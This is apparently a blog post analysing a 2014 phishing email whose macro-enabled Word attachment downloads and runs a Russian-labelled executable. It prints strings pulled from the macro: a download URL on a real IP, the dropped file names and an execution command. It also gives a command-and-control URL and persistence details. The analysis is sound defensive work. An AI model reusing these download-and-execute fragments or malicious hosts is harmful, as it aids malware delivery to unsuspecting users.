People still use Word macros!?!

I got an interesting email today.

 

1

 

The headers:

Received: from mail-qa0-f47.google.com (209.85.216.47) by
my.exchange.server (192.168.1.1) with Microsoft SMTP Server id
14.2.347.0; Wed, 22 Oct 2014 09:02:52 -0400
Received: by mail-qa0-f47.google.com with SMTP id cm18so2352642qab.6
for <me@myemail.com>; Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
X-Gm-Message-State: ALoCoQmf9GbcGqvsr0EmNIh1kGul9vAE9+L+H3zfk+CntPSkas8OLcrLeM9ISXmYIS16W57cL4L/f3pUKDnO10Mmi5n9T9cnDERwdGJaTC2EeaIDxh6tMsRjT3Dn47O9O/05tSlXz5UayMWhvD9Scvhx7fCjrrFSy0WYOv7nsHpSYcCzPY/mADE=
X-Received: by 10.140.30.53 with SMTP id c50mr52767444qgc.77.1413982971840;
Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
X-Received: by 10.140.30.53 with SMTP id c50mr52767433qgc.77.1413982971744;
Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
Return-Path: <Knowles.a55e63b1@airtelbroadband.in>
Received: from abts-mum-static-132.109.170.122.airtelbroadband.in
([122.170.109.132])       by mx.google.com with ESMTP id
64si27702535qgy.68.2014.10.22.06.02.12       for
<my@email.com>;       Wed, 22 Oct 2014 06:02:51 -0700 (PDT)
Received-SPF: Fail (my.exchange.server: domain of
Knowles.a55e63b1@airtelbroadband.in does not designate 209.85.216.47 as
permitted sender) receiver=my.exchange.server;
client-ip=209.85.216.47; helo=mail-qa0-f47.google.com;
Received-SPF: fail (google.com: domain of Knowles.a55e63b1@airtelbroadband.in does not designate 122.170.109.132 as permitted sender) client-ip=122.170.109.132;
Authentication-Results: mx.google.com;
spf=hardfail (google.com: domain of Knowles.a55e63b1@airtelbroadband.in does not designate 122.170.109.132 as permitted sender) smtp.mail=Knowles.a55e63b1@airtelbroadband.in;
dmarc=fail (p=NONE dis=NONE) header.from=airtelbroadband.in
From: Customer service <Knowles.a55e63b1@airtelbroadband.in>
To: <me@myemail.com>
Subject: Reference:UE301325TE
Date: Wed, 22 Oct 2014 18:31:54 +0530
Message-ID: <8376028997.8715871@myemail.com>
X-Priority: 3
X-Gm-Spam: 1
X-Gm-Phishy: 1
X-MS-Exchange-Organization-AuthSource: my.exchange.server
X-MS-Exchange-Organization-AuthAs: Anonymous
X-MS-Exchange-Organization-PRD: airtelbroadband.in
X-MS-Exchange-Organization-SenderIdResult: Fail
X-MS-Exchange-Organization-SCL: 0
X-MS-Exchange-Organization-PCL: 2
X-MS-Exchange-Organization-Antispam-Report: DV:3.3.14101.477;SID:SenderIDStatus Fail;OrigIP:209.85.216.47

 

Let’s start with the basic observations:

  1. From address does match the sending server, both being from “airtelbroadband.in”
  2. “Customer service <Knowles.a55e63b1@airtelbroadband.in>” – doesn’t seem like a legit email address for a customer service rep
  3. “Date: Wed, 22 Oct 2014 18:31:54 +0530” – note the +5:30 is the India time zone.
  4. “X-Gm-Spam: 1” and “X-Gm-Phishy: 1” tells me that the Gmail spam filters (formerly known as Postini) think this is spam and possibly a phishing attempt, but they let it through anyway. Thanks Gmail.
  5. “abts-mum-static-132.109.170.122.airtelbroadband.in” is a static IP address of a broadband service, probably in or at least near Mumbai, India. Static addresses usually go to business customers, so this probably belongs to a small company. According to http://en.wikipedia.org/wiki/Bharti_Airtel, Airtel runs a cellular network, fixed line broadband to homes, and provides TV service – so, basically, India’s version of Verizon.

 

 

It wasn’t the email or the headers that got my attention, though. It was the attachment. It’s been a while since I’ve seen an attempt to use a Word Document to spread malware. Very late-90’s of them.

 

The first stop was VirusTotal.com.
https://www.virustotal.com/en/file/3ffad81edbf822bd76de918e867a1a76a4c749ac833761785b409a8a764c9c20/analysis/1413983626/
It was scanned before, but only about 10 minutes before. 0/52 hits at the time I uploaded this.

 

Stepping over to the “Additional Information” tab, we see some interesting lines.

  1. “File type: Office Open XML Document” but this was a .doc not a .docx.
  2. “File names:” – has been uploaded several times under different names. All the names follow the same two letters, seven numbers, two letters ([A-Z]{2}[0-9]{7}[A-Z]{2}.doc) format. Indicates programmatically created names and no imagination.
  3. “Company: SPecialiST RePack” – created with a pirated copy of Word. A google of those two words lead me to this Russian pirate website: http:// www . 5peciali5t . tk
  4. “Creator: MMM” – the user name supplied by installed this pirated copy of Word
  5. “MIMEType: application/vnd.ms-word.document.macroEnabled” – macro enabled. Yup, saw that coming.
  6. “CreateDate: 2014:10:18 09:14:00Z” – this shows when Word created the new document. This is when the “new” button is pressed, which usually occurs before typing and pressing the save button.
  7. “ModifyDate: 2014:10:22 12:53:00Z” – this shows when Word last hit the save button. That is about 2 days worth of work on the part of this attacker, though it could be longer if the macro was cut-n-pasted from elsewhere. What is interesting here is how quickly this went from saved to sent (1pm to 3pm).

 

On to the file itself. Since it is really a docx and since those are really zipped XML, our first step is unzipping it.

  1. doc/docProps/core.xml – basic metadata, where we got company, author, and dates above
  2. doc/word/document.xml – the actual document. It just says “You didn’t enable macros.” And then has a picture to show you how. How convenient.
  3. doc/word/media/image1.gif – the embedded image

2

  1. doc/word/vbaData.xml – the part of the word doc that says how to handle the macro. The interesting part here is that there are actually four embedded macros:
    1. ThisDocument.Auto_Open
    2. ThisDocument.h
    3. ThisDocument.Workbook_Open
    4. ThisDocument.AutoOpen

This shows that the code was written to work in either Word or Excel, as AutoOpen is the only one that has meaning in Word, whereas Auto_Open is the command that would work in Excel. Workbook_Open is also Excel specific and slightly redundant, the difference between it and Auto_Open is slight and has to do with when each event is fired.

  1. doc/word/vbaProject.bin – this is the actual macro. I don’t really want to spend a lot of time doing code analysis here, but I will show you some interesting strings pulled from the file. The rest of the file was uploaded to pastebin here http://pastebin.com/NUGPQAFs
    1. $url = ‘http:// 162.243.234.167:8080 / gr / 4.exe’;
    2. $file = ‘crsss2.exe’;
    3. $someFilePath = $ScriptDir + ‘crsss2.exe’;
    4. $vbsFilePath = $ScriptDir + ‘ntuserskk.vbs’;
    5. $batFilePath = $ScriptDir + ‘ntusersss.bat’;
    6. $psFilePath = $ScriptDir + ‘ntusersc.ps1’;
    7. exe /c crsss2.exe;

So, basically, the code downloads “crsss2.exe” then tries to execute it via either a VisualBasic script, batch file, or powershell script. The IP “162.243.234.167” belongs to a Great Lakes Dermatology in New York.

 

 

I have gone this far, I might as well. So, I downloaded the “4.exe” and sent that up to VirusTotal. I wasn’t the first. It’s getting downloaded as 4.exe then renamed to crsss2.exe by the macro, yet crsss2.exe isn’t one of the alternate names that have been submitted to VirusTotal.
https://www.virustotal.com/en/file/992fefe6c60d93693be7790a03880cc39a6cc7eb197c8e28bafd53c5ebbfe638/analysis/1413990579/

 

I also did a search over at malwr.com to see what the Cuckoo Sandbox thought of this file. As I suspected, it had already been analyzed there as well.
https://malwr.com/analysis/NzkwYTY0MzAwNmNiNGVlNmFkZjZiZDEyMmQ5NDNkNzQ/

 

The “File Detail” tab at VirusTotal contained some fields that I thought might be interesting, but were coming back garbled. They get their data from a great tool that I love called ExifTool. So, I ran that locally and it turns out the garbled text was garbled because it was in Cyrillic.

Time Stamp                     : 2014:10:22 16:47:03-04:00
Language Code                   : Russian
Company Name                   : Корпорация MSoft
File Description               : Утилита запроса сервера терминалов
File Version                   : 5.3.5600.0 (xpclient.010817-1148)
Internal Name                   : qappsrv
Legal Copyright                : © Корпорация MSoft. Все права защищены.
Original Filename               : aaw2.exe
Product Name                   : Операционная система MS® Windows®
Product Version                 : 5.3.5600.0

 

The “File Description” basically says this is a terminal server utility.

The “Internal Name” “qappsrv” actually matches a legit file from Microsoft that is a “Query Remote Desktop Session Host Server Utility”, though this is obviously not THAT legit file.

 

Cuckoo Sandbox reports that it does the following:

  1. Drops a file named 2.tmp that is a dll.
  2. Creates a persistence mechanism in HKCU…Run
  3. Executes the renamed 2.tmp with rundll.exe
  4. Attempts to connect to http:// 178.250.243.114 / IArej7rcO / @HPZ8A5aPU_W /

 

 

Though the hash is different and the detection rate is different, the file appears to share a lot of internal information with this file: https://www.virustotal.com/en/file/e8b3301d112e5fc61bf42c3524cf15e392cba1eefd3d0183ca453ef81768ae6f/analysis/

https://malwr.com/analysis/YWQwODZmNTM2NmFkNGViNTg3YmNlY2U2OGM5ZjViMjI/

 

 

I think that’s enough fun for one day. Back to work.